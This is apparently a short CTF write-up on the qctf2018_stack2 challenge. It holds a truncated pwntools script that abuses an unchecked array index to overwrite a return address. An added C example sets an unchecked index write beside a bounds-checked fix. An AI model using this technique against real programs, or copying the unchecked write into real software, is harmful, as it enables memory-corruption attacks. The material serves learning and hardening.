week2

1 · · Aug. 2, 2021, 2:02 a.m.
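1. qctf2018_stack2

This challenge is quite a trap: the system("/bin/bash") it provides can't be used, and the offsets in IDA differ from the ones seen in gdb. The idea is to hijack ret through an out-of-bounds array index. (Locally I used Ubuntu 16 and the offset was always wrong; as soon as I switched to 18 it worked.)

```python
from pwn import *

#p = remote("node4.buuoj.cn",28526)
p = process("./stack2")
elf = ELF("./stack2")
context.log_level="debug"
#libc = ELF('./libc-2.23.so')

# Menu option 3 ("change number"): write num at array index idx.
# The index is what goes out of bounds to reach ret.
def edit(idx,num):
    p.recvuntil("5. exit\n")
    p.sendline("3")
    p.recvuntil("which number to change:\n")
    p.sendline(str(idx))
    p.recvuntil("new number:\n")
    p.sendline(str(num))
p...
```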
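The out-of-bounds index idea described above, shown from the fixing side as an added example that is not part of the original post or the challenge binary: an unchecked index write next to a bounds-checked one. The frame layout, the 100-entry array size, the marker value and all function names are assumptions made for illustration.

```c
#include <errno.h>
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>

/* Constructed model of a stack frame: a number array followed by a saved
   return address. The real binary's layout and offsets are different. */
#define NUMS 100
#define RET_MARKER 0x11223344u          /* constructed stand-in for ret */
struct frame {
    uint8_t  numbers[NUMS];
    uint32_t saved_ret;
};

/* Unchecked "change number": the user's index is used as a raw byte offset
   from the start of the array, so it can land past numbers[]. */
void change_unchecked(struct frame *f, long idx, uint8_t val) {
    ((uint8_t *)f)[idx] = val;
}

/* Hardened form: parse strictly, then range-check before writing.
   Returns 0 on success, -1 if the input is rejected. */
int change_checked(struct frame *f, const char *idx_text, uint8_t val) {
    char *end;
    errno = 0;
    long idx = strtol(idx_text, &end, 10);
    if (end == idx_text || *end != '\0' || errno == ERANGE)
        return -1;                      /* not a clean decimal number */
    if (idx < 0 || idx >= NUMS)
        return -1;                      /* outside numbers[] */
    f->numbers[idx] = val;
    return 0;
}

/* Returns 1 if the write altered the saved return address. */
int ret_changed_unchecked(long idx) {
    struct frame f = { .saved_ret = RET_MARKER };
    change_unchecked(&f, idx, 0x41);
    return f.saved_ret != RET_MARKER;
}

/* Same check for the hardened path, with the index given as text. */
int ret_changed_checked(const char *idx_text) {
    struct frame f = { .saved_ret = RET_MARKER };
    change_checked(&f, idx_text, 0x41);
    return f.saved_ret != RET_MARKER;
}
```

The checked version rejects negative indices as well as large ones, since a signed index that is only compared against the upper bound still reaches memory before the array.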